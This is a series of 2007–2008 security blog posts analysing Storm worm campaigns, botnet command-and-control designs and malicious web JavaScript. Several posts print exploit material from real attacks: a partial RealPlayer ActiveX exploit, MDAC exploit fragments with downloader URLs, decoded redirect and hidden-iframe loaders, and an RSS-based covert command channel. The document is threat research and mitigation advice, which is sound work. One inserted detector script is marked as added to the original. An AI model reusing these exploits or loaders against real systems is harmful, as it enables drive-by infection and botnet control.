Sunday, February 03, 2008

Botnet Distributed Command and Control. (DC&C)

Over the past four years we've seen a large number of law enforcement, ISPs, and hobbyists get involved with botnet monitoring. A side effect of the increased interest is that botnet operators will go to great lengths to keep their botnets hidden. That includes encryption, hiding in plain sight, use of undocumented/new protocols and distributed control structures. As law enforcement arrests more offenders, we see more of them using TOR, or their own botnets to hide their true identity. While I personally don't feel it will ever be the super-bug theory that Paul Vixie and Gadi Evron imagine, it is a concern we need to be aware of.

The following post may help drive some botnet operators deeper underground, but the concepts are not new. In many cases these concepts are in use today. I presented on these topics a year ago at the 5th Botnet Task Force conference. For a year security researchers and law enforcement have had the chance to reflect on my presentation and develop mitigation.

Distributed Command and Control is simply a term we use to identify botnets where the operator has learned that directly controlling a large botnet is a big risk to himself and his network. Large scale botnets still exist today, however the operators are wisely breaking these networks up into many smaller networks - or using peer to peer communication. Since the networks are spread out, it's harder to eliminate the threat of one attacker.

For example, if a botnet operator takes his 50,000 bots, and spreads them out into 10 networks, each net could have 5,000 drones. By spreading his network out, he mitigates some of the threat from rival operators, botnet hunters, ISPs, and law enforcement. Even if one controller node was taken offline, the botnet operator has 45,000 bots to retaliate with. In many circumstances this gives an operator the heads up he needs to update his 45,000 other bots and protect his empire.

As recently as two years ago we started seeing botnets using a pyramid structure, like the simplified image below.



A botnet operator is represented at the top of this flow chart. He communicates with a smaller botnet of only a couple dozen drones. Those drones then communicate with many larger botnets, which perform the stated action. This provides the botnet operator a layer of protection. Now the experienced researchers or law enforcement must find the smaller net to identify the botnet operator. This is time consuming work, and without the cooperation of ISPs, it's hard work. Even if a controller node is found, it is much easier to snoop on a net with 5,000-10,000 drones than on one with fewer than 100 drones.

This distributed structure also helps if the botnet operator wants to rent out or sell portions of his botnet. One chunk can be used for spam, while another may perform better in denial of service type activities.

Another example of distributed structure is the P2P scenario, where the botnet operator issues a command, which is passed to a number of supernodes, which then pass it on to the individual peers.

Mapping peer to peer and other types of DC&C is still possible. It was done with Stormworm and will continue to be done with future P2P botnets. I won't highlight how researchers are doing this mapping, simply because we need to weigh teaching the public (including bad guys) against keeping an ace up our sleeves. I'm hoping this post will spark many closed door conversations to help investigate other methods for tracking and identifying.

As part of the BTF presentation I gave, I wanted to outline additional C&C vectors that could be used. The idea that really caught my eye was based on hiding in plain sight: using protocols that are commonly used by millions of users every day. CME711 (Stormworm) has been easy to keep on top of, because of the mistakes they make in maintaining their DNS (fast flux), registering their domains and using UDP P2P traffic. Because of that UDP P2P traffic many large corporations have been immune - they disable UDP outbound.

The number of infected machines would increase dramatically if they used a connection model similar to Skype.

So back to hiding in plain sight - What would you say to a bot that received its commands over RSS? News readers use RSS to gather headlines and a few lines of news. Users are able to quickly choose articles that interest them, while ignoring those that do not. Millions of people subscribe to RSS feeds, and many of those feeds are of blog or comment pages. Many news sites allow comments on their website, which can then be retrieved via RSS. Since RSS is simply HTTP requests wrapped in a pretty new interface (XML), bots could easily parse this data to receive commands. An anonymous poster could post a command, and bots could be scheduled to pull the feed every 10-15 minutes. The requests would look like legitimate RSS traffic, and it would be hard to tell which visitors were bots and which were legitimate.

Using a form of encryption, the botnet operator could even protect his botnet so others were unable to issue commands. High profile news and blogging sites might not be so helpful with requests to disable portions of their website because a botnet used it as a command and control vector. They might be more willing to assist law enforcement, though, certainly more willing than some ISPs.
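The detection side of that scenario, as an added example that is not part of the original post: a bot scheduled to pull a feed every 10-15 minutes leaves a near-constant gap between requests in proxy logs, while a person reading the same feed does not. The log lines, host names and thresholds below are constructed for the illustration.

```javascript
"use strict";

// Constructed proxy log lines (not from the post): timestamp, client address, URL.
// 10.0.0.7 fetches the comments feed every ten minutes almost to the second;
// 10.0.0.21 is a person reading the same feed at irregular times.
const SAMPLE_LOG = `
2008-02-03T08:00:02Z 10.0.0.7 http://news.example/comments/feed.xml
2008-02-03T08:10:01Z 10.0.0.7 http://news.example/comments/feed.xml
2008-02-03T08:20:03Z 10.0.0.7 http://news.example/comments/feed.xml
2008-02-03T08:30:02Z 10.0.0.7 http://news.example/comments/feed.xml
2008-02-03T08:40:01Z 10.0.0.7 http://news.example/comments/feed.xml
2008-02-03T08:50:02Z 10.0.0.7 http://news.example/comments/feed.xml
2008-02-03T08:03:44Z 10.0.0.21 http://news.example/comments/feed.xml
2008-02-03T08:31:10Z 10.0.0.21 http://news.example/comments/feed.xml
2008-02-03T09:12:05Z 10.0.0.21 http://news.example/comments/feed.xml
2008-02-03T09:15:51Z 10.0.0.21 http://news.example/comments/feed.xml
2008-02-03T10:40:30Z 10.0.0.21 http://news.example/comments/feed.xml
2008-02-03T11:02:09Z 10.0.0.21 http://news.example/comments/feed.xml
`.trim();

// Parse "timestamp client url" lines into records with epoch seconds.
function parseLog(text) {
  return text.split("\n").map((line) => {
    const [ts, client, url] = line.trim().split(/\s+/);
    return { t: Date.parse(ts) / 1000, client, url };
  });
}

// Group requests by (client, url). For every series with enough samples compute the
// gaps between consecutive requests and their coefficient of variation (stddev/mean).
// A scheduled poll gives a CV near 0; a human reader gives a large one. Hits carry
// the observed period so an analyst can see the "every 10-15 minutes" schedule.
function findBeacons(records, { minRequests = 6, maxCv = 0.1 } = {}) {
  const series = new Map();
  for (const r of records) {
    const key = r.client + " " + r.url;
    if (!series.has(key)) series.set(key, []);
    series.get(key).push(r.t);
  }
  const hits = [];
  for (const [key, times] of series) {
    if (times.length < minRequests) continue;
    times.sort((a, b) => a - b);
    const gaps = times.slice(1).map((t, i) => t - times[i]);
    const mean = gaps.reduce((a, b) => a + b, 0) / gaps.length;
    const variance = gaps.reduce((a, g) => a + (g - mean) ** 2, 0) / gaps.length;
    const cv = Math.sqrt(variance) / mean;
    if (cv <= maxCv) {
      const [client, url] = key.split(" ");
      hits.push({ client, url, periodSeconds: Math.round(mean), cv: Number(cv.toFixed(3)) });
    }
  }
  return hits;
}
```

On real logs the same series analysis runs per feed URL across all clients, so a handful of hosts sharing one period to one obscure comments feed stands out even though each request on its own is indistinguishable from a news reader.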

So how do users protect themselves, and the rest of the internet community?

First, users should use common sense. Don't click links in email or instant messenger! If the email contains a link, use the cut and paste function to visit URLs. If you're offered a picture or video in instant messenger, verify the sender sent the file and only then use your best judgment before proceeding.

Don't download untrusted software. Even if it's recommended by your neighborhood computer genius (high school student) - do research with an internet search engine. What do others say about it?

Don't surf as an administrator. Even if you do pick up a piece of malware, if you're logged in with limited privileges you will be less likely to install harmful malware.

Online banking should be done from a secure location. Do not access your bank account from hotspots like coffee shops or restaurants. Avoid doing so from work as well - remember in the United States you have no right to privacy on your corporate PC, which likely means your boss is watching where you surf. He or she might just be using a keystroke logger.

Never give your personal information on the internet. Your bank will not notify you of account problems via email - and in the event that changes over the next few years, bank pages are usually encrypted. Watch for "https://" at the beginning of your URL bar. Watch for the padlock icon on most browsers. If you're presented with an expired or self-signed certificate, cancel the connection and notify the webmaster immediately.

Consider using a Sandboxer for programs that access the internet. SandboxIE is a great piece of software that will wrap around web browsers, email clients, instant messengers, just about any application that accesses the internet. It uses temporary user space to protect you from hostile code.

Don't consider "known" sites trusted. No site is ever trusted. Sites are compromised every day. Many times these compromises point to code that will attempt to compromise your PC.

If possible, disable Javascript for sites you casually visit. Using the NoScript Firefox plugin is an excellent idea for most users. This is becoming increasingly harder as poor coders are hired to develop websites.

Use firewalls at both the router and operating system level.

Turn your PC off when not in use. Even if your machine is infected, the damage it can do would be limited to the time you spend on your system. Most users are on their home computer for only a few hours a day.

Keep your Antivirus definitions and application patches up to date. Remember many third party applications will not update every month like your operating system. You should do this manually or work with the vendor to schedule updates.

Alternative operating systems are no excuse for poor security practices. Linux has malware, OS X has malware, BSD has malware. Keep your security hat on even if you don't run the targeted OS of the month.

Report suspected botnet activity and spam. CastleCops and Shadowserver have excellent resources available to help report malicious activity. DISOG staff always welcomes submissions via email (staff [-at-] disog.org).


Tuesday, January 15, 2008

CME711: Happy Valentines Day and Halifax phish

The CME711 gang has changed their tactics again. We've started seeing emails in our mail drops with pointers to nodes serving "withlove.exe" and "with_love.exe".

So far they have reverted back to sending IP's in the email body, which makes it easy for most spam filters to catch.

The website code looks the same as in previous runs, with false binaries in comments and the greeting:

Your download should begin shortly. If your download does not start
in 10-20 seconds, you can click hereto launch the download
and then press Run


The link is a javascript: document.write( unescape( '%3C%61%20%68%72%65%66%3D%22%77%69%74%68%5F%6C%6F%76%65%2E%65%78%65%22%3E%0D%0A' ) );

That javascript translates to withlove.exe -- Additionally there is an image of a pink heart on the page that links to with_love.exe. You may wish to update your snort signatures.

Additionally we're tracking a phish using stormworm fastflux nodes with the domain ibank-halifax.com.


Friday, December 28, 2007

New Year, Recycled Greeting Cards

The Storm authors have made up for their lack of creativity by registering a bunch of domains and quickly changing the filename. Additionally a false name has been added as a comment to the HTML source:

Your download should begin shortly. If your download does not start in
approximately 15 seconds,<br>
you can <!-- a href="fck2008.exe" !--><script language="javascript">
<!-- a href="fck2009.exe" -->
document.write( unescape(
'%3C%61%20%68%72%65%66%3D%22%68%61%70%70%79%6E%65%77%79%65%61%72%32%30%30%38%2E%65%78%65%22%3E'
) );

The JavaScript actually reads:

<a href="happynewyear2008.exe">

This was probably done in an attempt to identify automated scripts that parse the page for links, then crawl those links.

The following domains are still active (the other domains registered through ESTDOMAINS were suspended December 28th):

serving the following files:
happynewyear2008.exe
happy_2008.exe

sony.exe


Monday, December 24, 2007

Stormworm is back. - Have a Merry Christmas Dude, Mrs. Claus is kinky!


We just received a handful of these in our mail drops. Looks like the Grinch still runs Storm.
Received: from odv ([129.65.118.202])
by dxmbg (8.13.4/8.13.4) with SMTP id lBO3q3Xg061735;
Sun, 23 Dec 2007 19:52:03 -0800
Message-ID: <002601c845e0$2b459370$ca764181@odv>
From: jyothi@acc.aon.com
To: Nicholas
Subject: Santa Said, HO HO HO
Date: Sun, 23 Dec 2007 19:50:48 -0800
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="iso-8859-1";
reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106

hey,

I know you hate these kind of emails but this one is different. This
will be the best 2 min you spend this holiday. hehe
http:// merry christmas dude . com/

Which plays a happy little Christmas tune, offers stripshow.exe and visits this Neosploit:
http:// merrychristmasdude .com/ cgi-bin/ in.cgi?p=100

In place of MerryChristmasDude you could use ltbrew, tibeam, etc.

JSDecode (See previous post) has no issues with this javascript, and cleans it up to show:

var script = document.createElement("script");

script.setAttribute("language", "JavaScript");
script.setAttribute("src", "?t=595022058&r=2792316769&h=965359931&n=2128949605&flag_i");

document.body.appendChild(script);


So we look at cgi-bin/in.cgi?t=595022058&r=2792316769&h=965359931&n=2128949605&flag_i...

It took two passes, but JSDecode did its job:

....snip...
function startANI() {
var ifr = document.createElement("div");
document.body.appendChild(ifr);
ifr.innerHTML = '<iframe src="?o2&p=595022058&r=2792316769" height="1" width="1">'
return 0;
}

if (startMDAC() || makeSlide() || startQuickTime() || startSuperBuddy() || startAudioFile() || startGOM() || startWVF() || startANI()) { }
setTimeout("window.location = 'http://www.google.com'", 5000);
...snip...

The ANI looks fun:
From:
Subject:
Date: Thu, 20 Dec 2007 08:57:57 -0800
MIME-Version: 1.0
Content-Type: multipart/related;
type="text/html";
boundary="----=_NextPart_000_0005_01C842E6.6AA3A540"
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
This is a multi-part message in MIME format.
------=_NextPart_000_0005_01C842E6.6AA3A540
Content-Type: text/html;
charset="windows-1251"
Content-Transfer-Encoding: quoted-printable
Content-Location: http://testtest/index.html

------=_NextPart_000_0005_01C842E6.6AA3A540
Content-Type: application/octet-stream
Content-Transfer-Encoding: base64
Content-Location: http://testtest/1.dat
....
[BASE64 ENCODED FILE - infected: Exploit.Win32.MS05-002.Gen]


Once run in the sandbox, %windir%/disnisa.exe is the binary and %windir%/disnisa.config holds the peer list.

Same old storm, binary changes every few seconds, and someone's going to fall for it.

Complete binary analysis can be found at ASERT (Arbor Networks, Jose Nazario)


Saturday, December 22, 2007

The silent Storm and Javascript Decoding

It's been a while since I've posted anything. I haven't lost touch, I've just been busy with the upcoming holiday, and reserving myself for the next big Storm update.

A few of us were talking about Storm the other day, and Paul suggested that perhaps the authors have simply abandoned the current Storm botnet, in favor of laying low for a few months, and releasing a whole new version of the code, one with fewer bugs and some tactical modifications that might make it harder for security researchers to track them. I'm beginning to wonder if he's right. Storm has been silent since mid November. Is a New Year virus going to be born, something far more intrusive than Storm? Only time will tell. Thankfully we're getting a much needed break, so we can focus on other botnets.

---

There have been a good number of emails coming from users who wonder how we're able to decode some of the JavaScript seen on malware sites. The question usually comes after a reader has spotted a dangerous looking page, and we've confirmed it.

Daniel Wesemann has a great write up here. In fact Daniel sparked my interest in decoding malicious javascript instead of just running it through Rhino.

He and Jose Nazario with Arbor Networks have been great mentors. I thought I'd share something I put together using the skills taught by these two fellows.

I've built an automatic Javascript Decoder, which you can freely download and use. It is coded with an eye towards the unix flavor of OS, but should work fine if you have SpiderMonkey installed for Windows, and don't mind modifying the code slightly. Jsdecode is a public domain script that is simply a wrapper for Mozilla's SpiderMonkey application. Therefore, SpiderMonkey must be installed before this script will work.

Most of the malicious JavaScript can be decoded by simply running it through this script. So far I've only had a handful of malicious scripts requiring more advanced thought. The script isn't magic. It just creates a document.write function for you, modifies eval statements so they print to the screen, and reruns the decoded JavaScript to make sure it's not just double encoded. Other security researchers have written much better products, for example Malzilla from Boban Spasic.

This script just solves the "quick and dirty" requests I get on an almost daily basis. As is the case with any of my scripts, you're welcome to share them, modify them, even call them your own - but please give credit where credit is due, specifically to Jose and Daniel. If you use the script, or its techniques, consider dropping them a line and thanking them for helping educate the rest of us.

Happy Holidays,

Nicholas

jsdecode.pl.txt (rename to jsdecode.pl)


Wednesday, December 05, 2007

QuickTime and RealPlayer Exploits

We're seeing lots of reports about QuickTime and RealPlayer exploits in the wild. Other security vendors are privately reporting in excess of 300 sites infected with these exploits. Most of them are iframes pointing to encoded JavaScript. Of course users may never even know they've been infected.

Here is a partial snip of one exploit in human readable form:

function RealExploit()
{
var user = navigator.userAgent.toLowerCase();
if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
return;
if(user.indexOf("nt 5.")==-1)
return;
VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Real = new ActiveXObject(VulObject);
}catch(error)
{
return;
}
RealVersion = Real.PlayerProperty("PRODUCTVERSION");
Padding = "";
JmpOver = unescape("%75%06%74%04");
for(i=0;i<32*148;i++)
Padding += "S";
if(RealVersion.indexOf("6.0.14.") == -1)
{
if(navigator.userLanguage.toLowerCase() == "zh-cn")
ret = unescape("%7f%a5%60");
else if(navigator.userLanguage.toLowerCase() == "en-us")
ret = unescape("%4f%71%a4%60");
else
return;
}
else if(RealVersion == "6.0.14.544")
ret = unescape("%63%11%08%60");

.....

(removed some content)
.....
PayLoad = Padding + AdjESP + Shell;
while(PayLoad.length < 0x8000)
PayLoad += "copyleft";
Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);
}
RealExploit();

Many people forget to upgrade their third party applications. Please remember to apply all security patches for those as frequently as (or more often than) Windows updates.
In other news,

Storm (CME711) has been very quiet for about two weeks now. The websites are still listening, but not serving any content. I still expect something big for the Christmas/Hanukkah season.

A large number of readers have reported phishing sites since my last blog posting. I wouldn't be surprised to hear there are more victims with the online gift buying season in full swing.

Spam (especially adult oriented) appears to be on the rise, at least to our mail drops. In the last two hours we've received 86 enlargement offers - Perhaps someone is trying to tell me something? -- Maybe my wife is behind that campaign...

Happy Holidays!


Thursday, November 15, 2007

Stormworm using Geocities.

The Storm authors have updated their spam templates again. The spam links to several dozen Geocities pages.

Within the Geocities pages is some pretty poorly encoded Javascript. It decodes to:
<script type="text/javascript">
if (top.location != location) {
top.location.href = document.location.href ;
}
window.location = "http:// 58.65.238. 36/ aes/"
</script>

(Spaces added to prevent accidental clicks)

The site opened by the JavaScript looks like this:


The links would have you download iPIX-install.exe (md5: d23355080a5c4705300a617c864df35c) which creates and runs the file %system32%\ntos.exe on each reboot.

Anubis is perhaps the best public sandbox system I've seen. Their report on this file can be found here.


Wednesday, November 07, 2007

New style, same old exploits

The witches and goblins of storm have not finished their Halloween wrath.

At about 1300 hrs, UTC on November 7th, the xor’d mpack javascript was replaced with an iframe:

<iframe src="http://removed.for.your.protection/cgi-bin/in.cgi?p=user1" height="0" width="0">

This iframe redirects you to some heavily layered javascript. After peeling back the layers, the finished product looks like this:

…snip…
function startMDAC() {
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe = 'http://removed.for.your.protection/cgi-bin/in.cgi?u2_1_600_2_0_870665223_2792316769_2354152789';
}
…snip…

The link in the urlRealExe variable is formally known as file.php. It is a downloader which grabs sony.exe and connects to the network.

There has been no change in the social engineering vectors, but the attempt to hide their exploit in layered JavaScript is new and might confuse antivirus.

Update: The servers are now responding with 500 (Internal Server Errors) when trying to access the /cgi-bin/in.cgi file.

Update 2: The new filename is dancer.exe. The email body provided to me has the word 'plain' incorrectly spelled as plane.


Wednesday, October 31, 2007

Javascript Webmail Exploit

We recently received an interesting exploit that has the potential of creating an ample amount of grief for both ISPs and their customers. The code is spread using webmail providers who do not properly filter javascript in the body of HTML emails.

Our sample came from one of our readers with the notes:
I went to view the message to see what was up and it was addressed to someone other than me, had a subject line of "In the office" and had what appeared to be a blank body. However after a few seconds it showed "Loading body of message" or something similar and tried to push me to a link ijk.cc /E /ani / ani1.htm which McAfee Site Advisor blocked as harmful.
.....my traditional signature that I've always had was changed to "Troy Ball", so I freaked! I checked all the settings and found that only my signature line info was changed. What's scary is that I did nothing but view the email in webmail to start the chain of events.
This exploit does not show much in the way of original thought from the criminal element. It is, in fact, the all too often standard malicious JavaScript on a compromised host leveraging a Microsoft ActiveX control and a new variant of an old Trojan backdoor to generate a ton of spam. Naturally, that should raise the question as to what, exactly then, are the interesting parts of this attack.

The very lack of innovation in this attack is interesting in that it demonstrates how confoundedly easy it is for bad people to prey on weaker people. The actual code in the attack is rather mundane and we will provide a description of what the code is doing later. It is interesting to see, however, that the malicious code behind the JavaScript portion of this attack has had some exposure to advanced programming techniques and demonstrates a certain amount of maturity in coding style. Of course, the coder attempted to hide their code behind format and variable name mangling as well as string encoding. None of these obfuscation approaches present much of a challenge in this particular code. Perhaps the coder was not trying all that hard to cover their tracks. In fact, the coder left an apparent remnant of their testing domain embedded in the code, although that may just be another attempt to cover their tracks.

That said, Pogo's "We have met the enemy and he is us!" slogan comes immediately to mind. Once again, people need to be reminded that JavaScript and ActiveX content just isn't safe. Unfortunately, past performance indicates user education only has value under certain conditions so we will continue to see such problems.

On to the JavaScript! The script has several areas worthy of remark. It sets and checks a cookie which is used to determine if mail is to be sent via web mail or from a mail application on the a.ijk.cc test domain.

The script also uses the ActiveX MSXML2.XMLHTTP or Microsoft.XMLHTTP control to stream mail through the web mail interface tailored to those of various ISPs limited to:
att
bellsouth
comcast
cox
earthlink.net
excite
mail.com
netzero
optonline
peoplepc
rr.com
verizon
Spam from the exploit appears to use one of the following mail titles:

JUST FOR YOU, That gray suit, cell phone, 11 Sep, Need help, Amazing illusion, good point, saludos, Cause you're my girl, Kid lost, Boss Is Always Right, our schedule, nice, funny shit, work vs prison, how are you, great news, my new contacts, change, resume, :), ;), Too FUNNY Humans, pls, don't forget, hola comrados, Help, question, Could You Drive Over This Bridge?, quick question, a friend, Women, alive or not?, BTW, WTF, why not?, our car, pickup, Working with idiots, Annoying Coworkers, Hi y Bye, maybe?, how are you, Love it!, Good illustration, Fun pics, spiderman :), Cute video, Age test, red bull, Cute Survey, in the office

In addition to the above target ISPs domains, the spam will attempt to appear to be from one of 211 other domains:


The exploit also uses several user IDs as the sender, such as postmaster, but there is only so much list-reading agony that one should have to go through.

Antivirus detection of the malware dll is minimal with only Ikarus, Microsoft and Panda identifying the file as potentially malicious.

Antivirus        Version         Last Update   Result
AhnLab-V3        2007.10.31.0    2007.10.30    -
AntiVir          7.6.0.30        2007.10.30    -
Authentium       4.93.8          2007.10.30    -
Avast            4.7.1074.0      2007.10.30    -
AVG              7.5.0.503       2007.10.30    -
BitDefender      7.2             2007.10.30    -
CAT-QuickHeal    9.00            2007.10.30    -
ClamAV           0.91.2          2007.10.30    -
DrWeb            4.44.0.09170    2007.10.30    -
eSafe            7.0.15.0        2007.10.28    -
eTrust-Vet       31.2.5253       2007.10.30    -
Ewido            4.0             2007.10.30    -
FileAdvisor      1               2007.10.30    -
Fortinet         3.11.0.0        2007.10.19    -
F-Prot           4.3.2.48        2007.10.30    -
F-Secure         6.70.13030.0    2007.10.30    -
Ikarus           T3.1.1.12       2007.10.30    Backdoor.Win32.Agent.aiy
Kaspersky        7.0.0.125       2007.10.30    -
McAfee           5152            2007.10.30    -
Microsoft        1.2908          2007.10.30    Backdoor:Win32/Agent.ACE
NOD32v2          2627            2007.10.30    -
Norman           5.80.02         2007.10.30    -
Panda            9.0.0.4         2007.10.30    Suspicious file

Backdoor.Win32.Agent.aiy/Agent.ACE has been around for some time so the lack of detection of the accompanying DLL is likely due to the use of a variant of an existing backdoor.

(Post and analysis provided by Randy V)

Mitigation:
Disable or restrict Javascript. I use the NoScript plugin for Mozilla. If you use one of the webmail providers listed above, consider switching to text only emails, or using pop3 and disabling HTML tags in your client.

If you believe you've been infected, scan your PC with a name brand anti-virus scanner, like BitDefender, Kaspersky, or Trendmicro.
